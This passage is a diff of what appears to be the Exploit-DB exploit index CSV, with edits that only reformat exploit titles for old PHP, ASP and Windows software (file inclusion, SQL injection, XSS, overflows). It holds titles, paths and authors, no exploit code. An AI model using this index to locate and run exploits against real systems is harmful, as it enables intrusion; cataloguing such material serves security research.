Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 +28152,platforms/php/webapps/28152.txt,"free QBoard 1.1 - contact.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28153,platforms/php/webapps/28153.txt,"free QBoard 1.1 delete.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 -28154,platforms/php/webapps/28154.txt,"free QBoard 1.1 faq.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 +28154,platforms/php/webapps/28154.txt,"free QBoard 1.1 - faq.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28155,platforms/php/webapps/28155.txt,"free QBoard 1.1 features.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28156,platforms/php/webapps/28156.txt,"free QBoard 1.1 history.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28157,platforms/php/webapps/28157.txt,"VirtuaStore 2.0 Password Parameter SQL Injection",2006-07-03,supermalhacao,php,webapps,0 @@ -25244,9 +25244,9 @@ id,file,description,date,author,platform,type,port 28182,platforms/multiple/dos/28182.java,"MICO Object Key 2.3.12 - Remote Denial of Service",2006-07-06,tuergeist,multiple,dos,0 28183,platforms/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Stored XSS",2013-09-10,loneferret,windows,remote,0 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 -28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 (search.php cat_id param) - SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 +28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - (search.php cat_id param) SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 Message Buffer Overflow",2006-07-06,"Luigi Auriemma",windows,remote,0 -28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer CAnchorElement Use-After-Free (MS13-055)",2013-09-10,Metasploit,windows,remote,0 +28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055)",2013-09-10,Metasploit,windows,remote,0 28188,platforms/windows/remote/28188.rb,"HP SiteScope - Remote Code Execution (2)",2013-09-10,Metasploit,windows,remote,8080 28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,windows,remote,0 28190,platforms/php/webapps/28190.txt,"ExtCalendar 2.0 - ExtCalendar.php Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0 @@ -25288,7 +25288,7 @@ id,file,description,date,author,platform,type,port 28227,platforms/windows/dos/28227.txt,"Microsoft Windows 2000/XP - Registry Access Local Denial of Service",2006-07-15,"David Matousek",windows,dos,0 28228,platforms/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 CreateRemoteThread Denial of Service",2006-07-15,"David Matousek",hardware,dos,0 28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Inclusion",2006-07-17,"Tan Chew Keong",php,webapps,0 -28230,platforms/hardware/dos/28230.txt,"Multiple D-Link Routers UPNP Buffer Overflow",2006-07-17,"Barnaby Jack",hardware,dos,0 +28230,platforms/hardware/dos/28230.txt,"Multiple D-Link Routers - UPNP Buffer Overflow",2006-07-17,"Barnaby Jack",hardware,dos,0 28231,platforms/php/webapps/28231.txt,"ListMessenger 0.9.3 LM_Path Parameter Remote File Inclusion",2006-07-17,xoron,php,webapps,0 28232,platforms/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 FiltNT.SYS Local Denial of Service",2006-07-17,"Bipin Gautam",windows,dos,0 28233,platforms/php/webapps/28233.txt,"Calendar Module 1.5.7 For Mambo - Com_Calendar.php Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 @@ -25307,9 +25307,9 @@ id,file,description,date,author,platform,type,port 28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 - Index.php Remote File Inclusion",2006-07-20,r0t,php,webapps,0 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise index.php d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - index.php b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 -28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 News.php Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0 +28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 - News.php Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0 28252,platforms/windows/dos/28252.txt,"Microsoft Internet Explorer 6.0 String To Binary Function Denial of Service",2006-07-20,hdm,windows,dos,0 -28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 Common.Inc.php Remote File Inclusion",2006-07-21,Solpot,php,webapps,0 +28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 - Common.Inc.php Remote File Inclusion",2006-07-21,Solpot,php,webapps,0 28254,platforms/multiple/remote/28254.txt,"Apache Tomcat 5 Information Disclosure",2006-07-21,"ScanAlert Security",multiple,remote,0 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - Index.php Directory Traversal",2006-07-21,kicktd,php,webapps,0 28256,platforms/windows/dos/28256.html,"Microsoft Internet Explorer 6.0 Internet.HHCtrl Click Denial of Service",2006-07-22,"Alex F",windows,dos,0 @@ -25349,9 +25349,9 @@ id,file,description,date,author,platform,type,port 28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0 28293,platforms/multiple/dos/28293.txt,"Oracle 10g Alter Session Integer Overflow",2006-07-27,"putosoft softputo",multiple,dos,0 28294,platforms/php/webapps/28294.txt,"PHP-Nuke - INP Modules.php Cross-Site Scripting",2006-07-28,l2odon,php,webapps,0 -28295,platforms/php/webapps/28295.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla wp-comments-post.php - Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 -28296,platforms/php/webapps/28296.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla wp-feed.php - Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 -28297,platforms/php/webapps/28297.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla wp-trackback.php - Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 +28295,platforms/php/webapps/28295.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla - wp-comments-post.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 +28296,platforms/php/webapps/28296.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla - wp-feed.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 +28297,platforms/php/webapps/28297.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla - wp-trackback.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 28298,platforms/windows/remote/28298.txt,"Yahoo! Messenger 7.0/7.5 - Remote Search String Arbitrary Browser Navigation",2006-07-28,"Ivan Ivan",windows,remote,0 28299,platforms/windows/dos/28299.pl,"Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service",2006-07-29,"Mr. Niega",windows,dos,0 28300,platforms/php/webapps/28300.txt,"Advanced Webhost Billing System 2.2.2 Contact.php Multiple Cross-Site Scripting Vulnerabilities",2006-07-29,newbinaryfile,php,webapps,0 @@ -25361,7 +25361,7 @@ id,file,description,date,author,platform,type,port 28304,platforms/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 Top.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 28305,platforms/php/webapps/28305.txt,"Ajax Chat 0.1 operator_chattranscript.php chatid Parameter Traversal Arbitrary File Access",2006-07-31,SirDarckCat,php,webapps,0 28306,platforms/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 signup.php site_name Parameter SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 -28307,platforms/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 admin.php Multiple Parameter SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 +28307,platforms/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - admin.php Multiple Parameter SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0 28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injection",2006-07-31,CR,php,webapps,0 28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component Admin.Moskool.php Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0 @@ -25375,8 +25375,8 @@ id,file,description,date,author,platform,type,port 28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script - Index.php Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 28320,platforms/php/webapps/28320.txt,"Knusperleicht GuestBook 3.5 GB_PATH Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 28321,platforms/cgi/webapps/28321.pl,"Barracuda Spam Firewall 3.3.x - preview_email.cgi file Parameter Arbitrary File Access",2006-08-01,"Greg Sinclair",cgi,webapps,0 -28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 Error.php Information Disclosure",2006-08-01,SirDarckCat,php,webapps,0 -28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 UpdatePF.php Authentication Bypass",2006-08-01,SirDarckCat,php,webapps,0 +28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 - Error.php Information Disclosure",2006-08-01,SirDarckCat,php,webapps,0 +28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 - UpdatePF.php Authentication Bypass",2006-08-01,SirDarckCat,php,webapps,0 28324,platforms/php/webapps/28324.txt,"Blackboard Products 6 - Multiple HTML Injection Vulnerabilities",2006-08-24,proton,php,webapps,0 28325,platforms/php/webapps/28325.txt,"OZJournals 1.5 - Multiple Input Validation Vulnerabilities",2006-08-02,Luny,php,webapps,0 28326,platforms/php/webapps/28326.txt,"VWar 1.x - war.php page Parameter XSS",2006-08-03,mfoxhacker,php,webapps,0 @@ -25400,7 +25400,7 @@ id,file,description,date,author,platform,type,port 28344,platforms/multiple/remote/28344.txt,"DConnect Daemon Listen Thread UDP Remote Buffer Overflow",2006-08-06,"Luigi Auriemma",multiple,remote,0 28345,platforms/multiple/dos/28345.txt,"DConnect Daemon DC Chat Denial of Service",2006-08-06,"Luigi Auriemma",multiple,dos,0 28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 - Index.php Cross-Site Scripting",2006-09-11,"HACKERS PAL",php,webapps,0 -28347,platforms/php/webapps/28347.txt,"XennoBB 2.1 Profile.php Multiple SQL Injection",2006-08-07,"Chris Boulton",php,webapps,0 +28347,platforms/php/webapps/28347.txt,"XennoBB 2.1 - Profile.php Multiple SQL Injection",2006-08-07,"Chris Boulton",php,webapps,0 28348,platforms/linux/dos/28348.txt,"Clam Anti-Virus ClamAV 0.88.x - UPX Compressed PE File Heap Buffer Overflow",2006-08-07,"Damian Put",linux,dos,0 28349,platforms/php/webapps/28349.txt,"TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 28350,platforms/php/webapps/28350.txt,"VWar 1.5 war.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 @@ -25417,7 +25417,7 @@ id,file,description,date,author,platform,type,port 28361,platforms/multiple/dos/28361.c,"Festalon 0.5 HES Files Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos,0 28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 Security Bypass",2006-08-09,omnipresent,php,webapps,0 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injection",2006-08-09,ASIANEAGLE,php,webapps,0 -28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 Profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0 +28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - Profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0 28365,platforms/multiple/remote/28365.txt,"Apache 2.2.2 - CGI Script Source Code Information Disclosure",2006-08-09,"Susam Pal",multiple,remote,0 28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - Mybloggie_Root_Path Parameter Multiple Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0 28367,platforms/linux/dos/28367.txt,"AlsaPlayer 0.99.x - Multiple Buffer Overflow Vulnerabilities",2006-08-09,"Luigi Auriemma",linux,dos,0 @@ -25435,7 +25435,7 @@ id,file,description,date,author,platform,type,port 28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 Install3.php Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 28380,platforms/linux/dos/28380.txt,"Mozilla Firefox 1.0.x - JavaScript Handler Race Condition Memory Corruption",2006-08-12,"Michal Zalewski",linux,dos,0 28381,platforms/windows/dos/28381.txt,"Microsoft Windows XP/2000/2003 help - Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0 -28382,platforms/php/webapps/28382.txt,"WP-DB Backup For WordPress 1.6/1.7 Edit.php - Directory Traversal",2006-08-14,"marc & shb",php,webapps,0 +28382,platforms/php/webapps/28382.txt,"WP-DB Backup For WordPress 1.6/1.7 - Edit.php Directory Traversal",2006-08-14,"marc & shb",php,webapps,0 28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x - .SGI Image File Remote Heap Buffer Overflow",2006-08-14,"Damian Put",linux,dos,0 28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 @@ -25460,7 +25460,7 @@ id,file,description,date,author,platform,type,port 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0 28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQLi Privilege Escalation Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0 -28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 (index.php onlyforuser param) - SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 +28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - (index.php onlyforuser param) SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component mosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay Index.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 @@ -25484,24 +25484,24 @@ id,file,description,date,author,platform,type,port 28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - Index.php Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0 28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - Search_function.php Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0 28432,platforms/php/webapps/28432.txt,"BigACE 1.8.2 item_main.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 -28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 upload_form.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 -28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 download.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 -28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 admin.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 +28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - upload_form.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 +28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - download.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 +28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - admin.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28436,platforms/php/webapps/28436.txt,"AlstraSoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 28437,platforms/php/webapps/28437.txt,"Mambo/Joomla Com_comprofiler 1.0 Plugin.- class.php Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 28438,platforms/windows/remote/28438.html,"Microsoft Internet Explorer 5.0.1 Daxctle.OCX Spline Method Heap Buffer Overflow",2006-08-28,XSec,windows,remote,0 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 Hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0 28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusion",2006-08-29,sCORPINo,php,webapps,0 -28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 Comments.php SQL Injection",2006-08-30,Hessam-x,php,webapps,0 +28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 - Comments.php SQL Injection",2006-08-30,Hessam-x,php,webapps,0 28442,platforms/php/webapps/28442.txt,"LinksCaffe 2.0/3.0 - Authentication Bypass",2006-07-25,HoangYenXinhDep,php,webapps,0 28443,platforms/asp/webapps/28443.html,"Digiappz Freekot 1.01 ASP SQL Injection",2006-08-30,FarhadKey,asp,webapps,0 28444,platforms/php/webapps/28444.txt,"AlstraSoft Template Seller - Config[Template_Path] Multiple Remote File Inclusion",2006-08-30,night_warrior771,php,webapps,0 28445,platforms/php/webapps/28445.txt,"MyBulletinBoard 1.x - Functions_Post.php Cross-Site Scripting",2006-08-30,imei,php,webapps,0 28446,platforms/php/webapps/28446.txt,"HLstats 1.34 - Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps,0 -28447,platforms/php/webapps/28447.php,"OsCommerce 2.1/2.2 Product_info.php SQL Injection",2006-08-30,"James Bercegay",php,webapps,0 -28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 admin/newsletters.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 admin/orders_status.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 admin/products_attributes.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28447,platforms/php/webapps/28447.php,"OsCommerce 2.1/2.2 - Product_info.php SQL Injection",2006-08-30,"James Bercegay",php,webapps,0 +28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 - admin/newsletters.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - admin/orders_status.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - admin/products_attributes.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28463,platforms/windows/dos/28463.html,"SolarWinds Server and Application Monitor ActiveX (Pepco32c) Buffer Overflow",2013-09-22,blake,windows,dos,0 28464,platforms/php/webapps/28464.txt,"VisualShapers EzContents 2.0.3 Headeruserdata.php SQL Injection",2006-08-30,DarkFig,php,webapps,0 28465,platforms/php/webapps/28465.txt,"VisualShapers EzContents 2.0.3 Loginreq2.php Cross-Site Scripting",2006-08-30,DarkFig,php,webapps,0 @@ -25522,7 +25522,7 @@ id,file,description,date,author,platform,type,port 28461,platforms/php/webapps/28461.txt,"ezContents 2.0.3 - search.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28462,platforms/php/webapps/28462.txt,"ezContents 2.0.3 - toprated.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28469,platforms/windows/dos/28469.txt,"Internet Security Systems 3.6 BlackICE - Local Denial of Service",2006-09-01,"David Matousek",windows,dos,0 -28470,platforms/php/webapps/28470.txt,"VBZoom 1.11 Profile.php Cross-Site Scripting",2006-09-01,Crack_MaN,php,webapps,0 +28470,platforms/php/webapps/28470.txt,"VBZoom 1.11 - Profile.php Cross-Site Scripting",2006-09-01,Crack_MaN,php,webapps,0 28471,platforms/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x - Remote File Inclusion",2006-09-01,h4ck3riran,php,webapps,0 28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 IBrowser Remote File Inclusion",2006-09-01,Ironfist,php,webapps,0 28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 Aut_Verifica.Inc.php SQL Injection",2006-09-02,SirDarckCat,php,webapps,0 @@ -25618,23 +25618,23 @@ id,file,description,date,author,platform,type,port 28568,platforms/php/webapps/28568.txt,"NX5Linkx 1.0 Links.php HTTP Response Splitting",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0 28569,platforms/php/webapps/28569.txt,"ActiveCampaign KnowledgeBuilder 2.2 - Remote File Inclusion",2006-09-14,igi,php,webapps,0 28570,platforms/cgi/webapps/28570.txt,"Mailman 2.1.x - Multiple Input Validation Vulnerabilities",2006-09-14,"Moritz Naumann",cgi,webapps,0 -28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 admin/inc/footer.inc.php Multiple Parameter XSS",2006-09-14,"HACKERS PAL",php,webapps,0 -28572,platforms/php/webapps/28572.txt,"DCP-Portal 6.0 admin/inc/header.inc.php Multiple Parameter XSS",2006-09-14,"HACKERS PAL",php,webapps,0 +28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 - admin/inc/footer.inc.php Multiple Parameter XSS",2006-09-14,"HACKERS PAL",php,webapps,0 +28572,platforms/php/webapps/28572.txt,"DCP-Portal 6.0 - admin/inc/header.inc.php Multiple Parameter XSS",2006-09-14,"HACKERS PAL",php,webapps,0 28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 - login.php username Parameter SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 28574,platforms/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",php,webapps,0 28575,platforms/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Inclusion",2006-09-14,"Saudi Hackrz",php,webapps,0 28576,platforms/osx/local/28576.txt,"Apple Mac OS X 10.x - KExtLoad Format String Weakness",2006-09-14,"Adriel T. Desautels",osx,local,0 -28577,platforms/asp/webapps/28577.txt,"ClickBlog! 2.0 Default.ASP SQL Injection",2006-09-14,ajann,asp,webapps,0 +28577,platforms/asp/webapps/28577.txt,"ClickBlog! 2.0 - Default.ASP SQL Injection",2006-09-14,ajann,asp,webapps,0 28578,platforms/osx/dos/28578.txt,"Apple Mac OS X 10.x - KExtLoad Buffer Overflow Weakness",2006-09-14,"Adriel T. Desautels",osx,dos,0 28579,platforms/php/webapps/28579.txt,"MyBulletinBoard 1.x - Index.php Cross-Site Scripting",2006-09-15,"HACKERS PAL",php,webapps,0 28580,platforms/php/webapps/28580.txt,"NextAge Cart Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,php,webapps,0 -28581,platforms/php/webapps/28581.txt,"Jupiter CMS 1.1.4/1.1.5 galleryuploadfunction.php Arbitrary File Upload",2006-09-15,"HACKERS PAL",php,webapps,0 +28581,platforms/php/webapps/28581.txt,"Jupiter CMS 1.1.4/1.1.5 - galleryuploadfunction.php Arbitrary File Upload",2006-09-15,"HACKERS PAL",php,webapps,0 28582,platforms/php/webapps/28582.txt,"Jupiter CMS 1.1.4/1.1.5 modules/blocks.php Multiple Parameter XSS",2006-09-15,"HACKERS PAL",php,webapps,0 28583,platforms/php/webapps/28583.txt,"Jupiter CMS 1.1.4/1.1.5 modules/register.php Multiple Parameter XSS",2006-09-15,"HACKERS PAL",php,webapps,0 28584,platforms/php/webapps/28584.txt,"Jupiter CMS 1.1.4/1.1.5 modules/mass-email.php Multiple Parameter XSS",2006-09-15,"HACKERS PAL",php,webapps,0 28585,platforms/php/webapps/28585.txt,"Jupiter CMS 1.1.4/1.1.5 modules/search.php Multiple Parameter XSS",2006-09-15,"HACKERS PAL",php,webapps,0 28586,platforms/php/webapps/28586.txt,"Jupiter CMS 1.1.4/1.1.5 modules/register Multiple Parameter SQL Injection",2006-09-15,"HACKERS PAL",php,webapps,0 -28587,platforms/asp/webapps/28587.txt,"EasyPage 7 Default.ASPX SQL Injection",2006-09-15,s3rv3r_hack3r,asp,webapps,0 +28587,platforms/asp/webapps/28587.txt,"EasyPage 7 - Default.ASPX SQL Injection",2006-09-15,s3rv3r_hack3r,asp,webapps,0 28588,platforms/windows/dos/28588.txt,"Symantec Multiple Products - SymEvent Driver Local Denial of Service",2006-09-15,"David Matousek",windows,dos,0 28589,platforms/asp/webapps/28589.txt,"Web Wiz Forums 7.01 Members.ASP Cross-Site Scripting",2006-09-15,Crack_MaN,asp,webapps,0 28590,platforms/php/webapps/28590.txt,"Hitweb 3.0 - REP_CLASS Multiple Remote File Inclusion",2006-09-16,ERNE,php,webapps,0 @@ -25646,30 +25646,30 @@ id,file,description,date,author,platform,type,port 28596,platforms/php/webapps/28596.txt,"MyBulletinBoard 1.2 Generic_Error.php Multiple Cross-Site Scripting Vulnerabilities",2006-09-18,"HACKERS PAL",php,webapps,0 28597,platforms/asp/webapps/28597.txt,"ECardPro 2.0 - Search.ASP SQL Injection",2006-09-18,ajann,asp,webapps,0 28598,platforms/php/webapps/28598.txt,"IDevSpot BizDirectory 1.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-09-18,s3rv3r_hack3r,php,webapps,0 -28599,platforms/php/webapps/28599.txt,"NixieAffiliate 1.9 Lostpassword.php Cross-Site Scripting",2006-09-18,s3rv3r_hack3r,php,webapps,0 +28599,platforms/php/webapps/28599.txt,"NixieAffiliate 1.9 - Lostpassword.php Cross-Site Scripting",2006-09-18,s3rv3r_hack3r,php,webapps,0 28600,platforms/asp/webapps/28600.txt,"EShoppingPro 1.0 - Search_Run.ASP SQL Injection",2006-09-18,ajann,asp,webapps,0 28601,platforms/php/webapps/28601.txt,"PT News 1.7.8 - Search.php Cross-Site Scripting",2006-09-18,Snake,php,webapps,0 28602,platforms/multiple/remote/28602.txt,"OSU HTTP Server 3.10/3.11 - Multiple Information Disclosure Vulnerabilities",2006-09-19,"Julio Cesar Fort",multiple,remote,0 28603,platforms/php/webapps/28603.txt,"Innovate Portal 2.0 - Index.php Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 28604,platforms/php/webapps/28604.txt,"ESyndiCat 1.5 - Search.php Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 -28605,platforms/jsp/webapps/28605.txt,"NeoSys Neon Webmail for Java 5.06/5.07 downloadfile Servlet Traversal Arbitrary File Access",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28605,platforms/jsp/webapps/28605.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - downloadfile Servlet Traversal Arbitrary File Access",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28606,platforms/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updatemail Servlet Arbitrary Mail Message Manipulation",2006-09-20,"Tan Chew Keong",jsp,webapps,0 -28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 addrlist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - addrlist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28608,platforms/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 maillist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28609,platforms/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet in_id Variable Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28610,platforms/jsp/webapps/28610.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet in_name Parameter XSS",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28611,platforms/php/webapps/28611.txt,"RedBLoG 0.5 imgen.php Root Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 -28612,platforms/php/webapps/28612.txt,"RedBLoG 0.5 admin/config.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 +28612,platforms/php/webapps/28612.txt,"RedBLoG 0.5 - admin/config.php 